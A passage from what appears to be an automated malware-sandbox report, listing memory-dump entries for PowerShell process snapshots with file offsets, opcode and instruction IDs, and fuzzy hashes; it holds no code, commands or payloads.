                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 99864e7bfac27542477ba9a894faeb0844c52d953cb45461641d6813376cb186
                                                                                                                                                            • Instruction ID: 158d95f831e6e9ac08544cf3b88fed167f3cafed268e48817b9ba4c8eba767e1
                                                                                                                                                            • Opcode Fuzzy Hash: 99864e7bfac27542477ba9a894faeb0844c52d953cb45461641d6813376cb186
                                                                                                                                                            • Instruction Fuzzy Hash: 8D210353F1F6DA1FE7A1967808F50642BD1EF6665470900FED0A9CB1E7EC0C6C098311
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3f3b76edb185bbc374dc4cff2f5740cc176e858c9af1cf3fb2be6edbfa854974
                                                                                                                                                            • Instruction ID: 8c3988ff8df1975c3faeecf00c24100cd50f2f60d1bd5d002ae603245ee78dc1
                                                                                                                                                            • Opcode Fuzzy Hash: 3f3b76edb185bbc374dc4cff2f5740cc176e858c9af1cf3fb2be6edbfa854974
                                                                                                                                                            • Instruction Fuzzy Hash: 66112921B1FAC91FE7A5EA6948E19657BD2DF1121035D00FAC048CB1E3D808AC0483C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                            • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                                                                                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                            • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b7b3d75609fd20a156d0d68fc778d32a9f4dcd5ef558f1f6592d1c36b4193c01
                                                                                                                                                            • Instruction ID: dc1e031570e4ce9f83471ddb994d0a48f1fcd9d3d00dd24ad612c2a9ca9eb010
                                                                                                                                                            • Opcode Fuzzy Hash: b7b3d75609fd20a156d0d68fc778d32a9f4dcd5ef558f1f6592d1c36b4193c01
                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0E533B5D90D0AE395966C58651F9B3D2DFC4131B450177C15EC3196EE15D4074241
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f1d534e0149aa8686b56ea6cc58410b57baf7f564fd7f1515bbd6f2e8af3afbf
                                                                                                                                                            • Instruction ID: f0e526672050564cb295ea798771b5402b58897891ce31a67132d29b4bbee97e
                                                                                                                                                            • Opcode Fuzzy Hash: f1d534e0149aa8686b56ea6cc58410b57baf7f564fd7f1515bbd6f2e8af3afbf
                                                                                                                                                            • Instruction Fuzzy Hash: ACE0DF33B1EA090AFB5DA5AC28A25F8B3D1DF81120B48087FD14EC3487E91AA8120245
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \V=m
                                                                                                                                                            • API String ID: 0-2437245023
                                                                                                                                                            • Opcode ID: e8915e6783d413b389b1152dd32f6855dd7329c85069e8de472bed61c4731358
                                                                                                                                                            • Instruction ID: 1a8bb2851c2c98e3b70229b71e5a65f7ded07e0b3255acffff7345ad5ef540d2
                                                                                                                                                            • Opcode Fuzzy Hash: e8915e6783d413b389b1152dd32f6855dd7329c85069e8de472bed61c4731358
                                                                                                                                                            • Instruction Fuzzy Hash: 1DB16F70E00229DFDF14CFADCA8579EBBF2BF88304F148529D855A7254EB74A885DB81
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ed8cb5f3ff641d3bef151ee5058c7bf4d4d92f514daed58f83a8a4daded0b805
                                                                                                                                                            • Instruction ID: 0a82d097a28317e5d2bc45799f0f52181c4c6a33469412f39fa4a6a06cd37f2e
                                                                                                                                                            • Opcode Fuzzy Hash: ed8cb5f3ff641d3bef151ee5058c7bf4d4d92f514daed58f83a8a4daded0b805
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: tP^q$tP^q
                                                                                                                                                            • API String ID: 0-309238000
                                                                                                                                                            • Opcode ID: 26e5510fbf6adc15483f7cc09a5b5f46e67bbbdb792386b3c5785696e1462fd9
                                                                                                                                                            • Instruction ID: 932e55cfe0b9ea93ed7a99e2cbfbaedf9ca50982c7e55f06d48aa8d02d7c7ed3
                                                                                                                                                            • Opcode Fuzzy Hash: 26e5510fbf6adc15483f7cc09a5b5f46e67bbbdb792386b3c5785696e1462fd9
                                                                                                                                                            • Instruction Fuzzy Hash: 11517BB2B043558FC7248E6DD81066BFBE6AFD2210F18C4BBD545DB291DA32D845C7E1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: h]=m$I=m
                                                                                                                                                            • API String ID: 0-3726968776
                                                                                                                                                            • Opcode ID: 1234351fceec438c4c37a200d0a283aef46cbc22072a124e52897b70899ac490
                                                                                                                                                            • Instruction ID: 36e70f32f38745481cac3f84b836f980fa2a5e0467b3a1b887944d09346b9358
                                                                                                                                                            • Opcode Fuzzy Hash: 1234351fceec438c4c37a200d0a283aef46cbc22072a124e52897b70899ac490
                                                                                                                                                            • Instruction Fuzzy Hash: CA314C34B011688FCB25DF68C954AEEB7B2BF49304F1440E9D50AAB251CB35AE81CF91
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $^q$$^q
                                                                                                                                                            • API String ID: 0-355816377
                                                                                                                                                            • Opcode ID: 2de1987855bdf646691de73f5d14540c6845958d7bcfa4b57963ef26dd37a046
                                                                                                                                                            • Instruction ID: cf2d13ac7418761d7f1ba5efb50d4c66ff8429352f3ee5a293858d120136f8a2
                                                                                                                                                            • Opcode Fuzzy Hash: 2de1987855bdf646691de73f5d14540c6845958d7bcfa4b57963ef26dd37a046
                                                                                                                                                            • Instruction Fuzzy Hash: EF2102F2D04359DFCB259F6C85402AABBF6BF6A610B194497C848FB242D6359908C7E1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $^q$$^q
                                                                                                                                                            • API String ID: 0-355816377
                                                                                                                                                            • Opcode ID: b2c45ef0857117f7e560404684dff73fa38f3b55bbce5358b54cab1505db42c5
                                                                                                                                                            • Instruction ID: e4b358f7a53e7356583f4fcf58617ece1722f535e0028b72e0e48460061401ec
                                                                                                                                                            • Opcode Fuzzy Hash: b2c45ef0857117f7e560404684dff73fa38f3b55bbce5358b54cab1505db42c5
                                                                                                                                                            • Instruction Fuzzy Hash: 9F215BB13083496FD7350E3988457237FA65FA2728F28446BE548CF2D7D6788844C3A2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $^q$$^q
                                                                                                                                                            • API String ID: 0-355816377
                                                                                                                                                            • Opcode ID: 7e36205dee5d2ddceacde0c2b3d5f21c49949fd781fa92479395283a2321f03b
                                                                                                                                                            • Instruction ID: 9bd06cb0fea1221aa049125e3b6320d64f73ed493cf3180519b1ea83276fb9b8
                                                                                                                                                            • Opcode Fuzzy Hash: 7e36205dee5d2ddceacde0c2b3d5f21c49949fd781fa92479395283a2321f03b
                                                                                                                                                            • Instruction Fuzzy Hash: 6211DAF6D0021ADB8F249E6D85401B9B7F6BF68620B144567DC18FB204D731D944C7E5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q
                                                                                                                                                            • API String ID: 0-1614139903
                                                                                                                                                            • Opcode ID: 1b3d0c27966d536d92a362ff3d8a9a1c3c689fab6e4e4a3dc2abbbaf8857be52
                                                                                                                                                            • Instruction ID: b80eb361cb3acafc70d50aa93c891546fe82b8c57ff6c17c05b8abdc487e76f1
                                                                                                                                                            • Opcode Fuzzy Hash: 1b3d0c27966d536d92a362ff3d8a9a1c3c689fab6e4e4a3dc2abbbaf8857be52
                                                                                                                                                            • Instruction Fuzzy Hash: A85239B4A00205DFDB14CF58C445FAEBBB2BF95314F158169D909AB396CB76EC82CB81
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \V=m
                                                                                                                                                            • API String ID: 0-2437245023
                                                                                                                                                            • Opcode ID: 266939f90d89f2b864788b158a24e6b3ed103683bf72e1fb76f941b6499c2801
                                                                                                                                                            • Instruction ID: 36bd18a1ae39bfb75a395f25c161b0ce1d8c565fbc0b34c6e4a149e7b707a422
                                                                                                                                                            • Opcode Fuzzy Hash: 266939f90d89f2b864788b158a24e6b3ed103683bf72e1fb76f941b6499c2801
                                                                                                                                                            • Instruction Fuzzy Hash: C9B15DB0E00229DFDF50CFADCA8579EBBF1AF48304F148529E854A7254EB74A885DB91
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8
                                                                                                                                                            • API String ID: 0-4194326291
                                                                                                                                                            • Opcode ID: 5c176e4ce88bdacc4352adac9f73435e99c9cf152d6720623aca1dc112ea01ce
                                                                                                                                                            • Instruction ID: b079e6099678c17af7fabfdf615272d6f925bccb835156c55999c0181d565f5e
                                                                                                                                                            • Opcode Fuzzy Hash: 5c176e4ce88bdacc4352adac9f73435e99c9cf152d6720623aca1dc112ea01ce
                                                                                                                                                            • Instruction Fuzzy Hash: F1416E70A00214CFDB14DFA9C98469EBBF6FF85350F148529D446AB7A4DB74AC85CB90
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: tP^q
                                                                                                                                                            • API String ID: 0-2862610199
                                                                                                                                                            • Opcode ID: a1f0982a69b30abcbfb6860ce4ac09964ba1930b35cf43f08c99e849e56cccb3
                                                                                                                                                            • Instruction ID: 63d72dfaa9d8d4209982188970cdcd150c3992695dcd46e9790b8684968d2218
                                                                                                                                                            • Opcode Fuzzy Hash: a1f0982a69b30abcbfb6860ce4ac09964ba1930b35cf43f08c99e849e56cccb3
                                                                                                                                                            • Instruction Fuzzy Hash: A32138B1645345AFDB258E588C05BA6FFB2AF92210F0880AAE804DF192C731D944C7E2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e9183aff116277d895d68e532bb5048c627232f6774f8636ac4f502bc4c2a6ae
                                                                                                                                                            • Instruction ID: 6c7e59a8b1f80fe6fcf088b19ee09d567bd50b4553f46ca2f37dc89814af502e
                                                                                                                                                            • Opcode Fuzzy Hash: e9183aff116277d895d68e532bb5048c627232f6774f8636ac4f502bc4c2a6ae
                                                                                                                                                            • Instruction Fuzzy Hash: 6BF15AB4E01609DFDB14CF98C544EAABBB2BF99B14F19C069D809AB351C732EC45CB91
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 413fc9657bf3c1c5968e470715b43d2fc3a0da3cbd774bff8941ef562d6c8207
                                                                                                                                                            • Instruction ID: 412a4f7194ac03c8cb54ab40bc4f7224f14b3e110721764a92ac8d98d4bb08d1
                                                                                                                                                            • Opcode Fuzzy Hash: 413fc9657bf3c1c5968e470715b43d2fc3a0da3cbd774bff8941ef562d6c8207
                                                                                                                                                            • Instruction Fuzzy Hash: A9C18F31A00218DFDB14EFA8C644A9DBBB2FF85314F11865DE406AB265CB78EC49DB80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d7c18731b8fbbf9f4266fa588146fc3829e5b17f9b61e399c884196045dc09cc
                                                                                                                                                            • Instruction ID: 5c9371f9d857cf3e90f9e816a79a7248403c39f91f6087c378dd6e55449153b6
                                                                                                                                                            • Opcode Fuzzy Hash: d7c18731b8fbbf9f4266fa588146fc3829e5b17f9b61e399c884196045dc09cc
                                                                                                                                                            • Instruction Fuzzy Hash: 2DB18EB0B00209DFC714DF68C955F5EBBA2AF98318F118469D505AF395CB32EC818BE1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ca243c0ba91864ef480c17553f0cb480c20ed86999179618f9a223d1af4c3e10
                                                                                                                                                            • Instruction ID: c84e177fc391d7dd5f8d69ce18960895225a9da84b4af579c53e5593f63f8cba
                                                                                                                                                            • Opcode Fuzzy Hash: ca243c0ba91864ef480c17553f0cb480c20ed86999179618f9a223d1af4c3e10
                                                                                                                                                            • Instruction Fuzzy Hash: B0B18070E04219CFEB10CFACDA817DDBBF1AF49314F148529E815EB254EB74A845EB81
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0647efc80b34a87e24ae51d6861fb3460607f9114971785bc915ff3631799ac4
                                                                                                                                                            • Instruction ID: cdf0db4fcf48387f3bc8267ac4184f4ff64402833dc1d0a9b38a32b6ba3ae666
                                                                                                                                                            • Opcode Fuzzy Hash: 0647efc80b34a87e24ae51d6861fb3460607f9114971785bc915ff3631799ac4
                                                                                                                                                            • Instruction Fuzzy Hash: 33A19EB0A00205EFD714DF68C955F9ABBB2BF99318F118069D505AB391CB32EC91CBA1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0ac77a30885737a19fdcb49a82c424dc3ef9d25066638a213390d9dd32b8eb2d
                                                                                                                                                            • Instruction ID: d4280797ecc2ef763bcb8d9a3f5ca5d3873a650888a736b489a5a36894ba4564
                                                                                                                                                            • Opcode Fuzzy Hash: 0ac77a30885737a19fdcb49a82c424dc3ef9d25066638a213390d9dd32b8eb2d
                                                                                                                                                            • Instruction Fuzzy Hash: 9DA1CC74A042958FCB06CF5DC594AAABFB1FF49310B28859AD445EB2A6C735FC41CFA0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: aa71bf61ec37fd9c83575a7e44ba939239000d944678ed5865534c96c7e23ac6
                                                                                                                                                            • Instruction ID: 2254dfb522fd0def455528951d5a40ddea6ad695fb8a194b1431ee02a5614402
                                                                                                                                                            • Opcode Fuzzy Hash: aa71bf61ec37fd9c83575a7e44ba939239000d944678ed5865534c96c7e23ac6
                                                                                                                                                            • Instruction Fuzzy Hash: 2C81CE34A01254DFCB14DFA9D5849AEBBF2FF89304F1881A9E445AB322D739EC85DB50
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0e7097ed9c175c60e0e8573a1ee602b4065692a27cb7a7c4cafe12b2f79fe160
                                                                                                                                                            • Instruction ID: ba285d608d3fa11addeff8ffd09fca5a4adabff78f3e1accec0706f5a61005b6
                                                                                                                                                            • Opcode Fuzzy Hash: 0e7097ed9c175c60e0e8573a1ee602b4065692a27cb7a7c4cafe12b2f79fe160
                                                                                                                                                            • Instruction Fuzzy Hash: 7571CF70A00219CFCB14DFA8C580A9EBBF6FF85314F148569E446DB2A1DB74AC46CB80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6e0fa1cc501e5c3245667224b4df643bbc98bca59a025e8015b2335af1bf8b83
                                                                                                                                                            • Instruction ID: 8cabc7675963d0e8aa7ecc62579a353386318bc3ed5700748e598ddfc2f15401
                                                                                                                                                            • Opcode Fuzzy Hash: 6e0fa1cc501e5c3245667224b4df643bbc98bca59a025e8015b2335af1bf8b83
                                                                                                                                                            • Instruction Fuzzy Hash: 84715C70E00218DFDF14DFA9D554AAEBBF6BF88344F148429D412AB2A0DB74AC86DB41
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9bf967f139e074a0a354ef87ed563345426afe99bca91cf4590d9e35257e4191
                                                                                                                                                            • Instruction ID: b46a1cb7ce79178b114fde08c50f31908342d5a1e202dc15cc43f913186c6f14
                                                                                                                                                            • Opcode Fuzzy Hash: 9bf967f139e074a0a354ef87ed563345426afe99bca91cf4590d9e35257e4191
                                                                                                                                                            • Instruction Fuzzy Hash: C77159B4A00246DFD714CF58C545E6ABBB2EF94318F148069D9099B3A6CB76EC86CBC1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c2af0fa47c8b4ab51929e11492b01023fcedcdcae02b07d52660c4e6c7a6f00a
                                                                                                                                                            • Instruction ID: 5ddae31d27c72975b5c72ec6d565e4ce5d8d73c751c4974c9e49c5a20293cdd9
                                                                                                                                                            • Opcode Fuzzy Hash: c2af0fa47c8b4ab51929e11492b01023fcedcdcae02b07d52660c4e6c7a6f00a
                                                                                                                                                            • Instruction Fuzzy Hash: EC51D3F0F00609AFDB10CF5CC444A6ABBA2AFA4B18F14C06AE806DB351DA36DD41CBD1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 09353472d76b351129a8c51934079c8ac9b9ce6d6bfbb122c991438d9edfb30f
                                                                                                                                                            • Instruction ID: 773d32d5488fba162cf8d40297524b957394f4ba325b108e0d614bc14ba64eb7
                                                                                                                                                            • Opcode Fuzzy Hash: 09353472d76b351129a8c51934079c8ac9b9ce6d6bfbb122c991438d9edfb30f
                                                                                                                                                            • Instruction Fuzzy Hash: E541A0F17042648BCB259B7C841169ABFA29FE132CB1444AAD542DF395DEB2EC02C7E1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d40737e460b15231dcc391a9452f16dfdc578cfa60846e9309ce9746bc16af98
                                                                                                                                                            • Instruction ID: 361852ba5f9d785dc60b099d8cd8a0f2f47cf3e42ba9c4b830da31ee61522ea3
                                                                                                                                                            • Opcode Fuzzy Hash: d40737e460b15231dcc391a9452f16dfdc578cfa60846e9309ce9746bc16af98
                                                                                                                                                            • Instruction Fuzzy Hash: E0317EB4B40204ABD708EB6CC955FAF7B63AF94314F108424E9016F395CE76EC828BD1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2c7fc1f9042faeb7b2d1493857aa2dc22e738b6dcc8f90a579cf026bcc809a38
                                                                                                                                                            • Instruction ID: addf64584fd2657376895f791017f038c05b2fa676bc809f73cc5990cbb9028c
                                                                                                                                                            • Opcode Fuzzy Hash: 2c7fc1f9042faeb7b2d1493857aa2dc22e738b6dcc8f90a579cf026bcc809a38
                                                                                                                                                            • Instruction Fuzzy Hash: E6214CB130031AABDB285EAE9814737B6879FE4719F24842AA50ADB384DE75D841C3E1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
